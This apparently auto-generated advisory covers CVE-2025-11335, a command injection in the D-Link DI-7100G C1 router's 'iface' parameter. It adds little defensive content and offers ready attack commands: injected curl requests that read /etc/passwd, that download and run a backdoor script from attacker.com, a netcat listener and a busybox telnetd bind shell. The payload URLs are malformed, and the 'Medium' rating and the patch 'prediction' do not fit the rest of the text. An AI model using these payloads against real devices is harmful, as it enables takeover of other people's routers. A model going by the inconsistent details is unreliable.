D-Link DI-7100G C1, Command Injection, CVE-2025-11335 (Medium)

Listen to this Post

How the CVE Works

The vulnerability exists within the `jhttpd` web server component of the D-Link DI-7100G C1 router, specifically in the `sub_46409C` function that handles HTTP requests to the `/msp_info.htm?flag=qos` page. This function processes the `iface` argument from user-supplied input without proper sanitization. An attacker can craft a malicious HTTP request containing operating system commands within the `iface` parameter. Because the input is not neutralized before being passed to a system shell, the injected commands are executed with the privileges of the web server process. This allows for remote, unauthenticated command execution on the underlying operating system of the router, enabling full device compromise.
Platform: D-Link DI-7100G C1
Version: Up to 20250928
Vulnerability: Command Injection
Severity: Medium
date: 2025-10-06

Prediction: Patch expected 2025-12-15

What Undercode Say:

`curl -X GET “http:///msp_info.htm?flag=qos&iface=eth0;cat /etc/passwd”`
`curl -X GET “http:///msp_info.htm?flag=qos&iface=eth0;wget http://attacker.com/backdoor.sh -O /tmp/bd.sh; sh /tmp/bd.sh”`

`nc -lvnp 4444`

`/bin/busybox telnetd -l/bin/sh -p9999`

How Exploit:

Craft malicious HTTP GET request with shell commands in the `iface` parameter to achieve remote code execution.
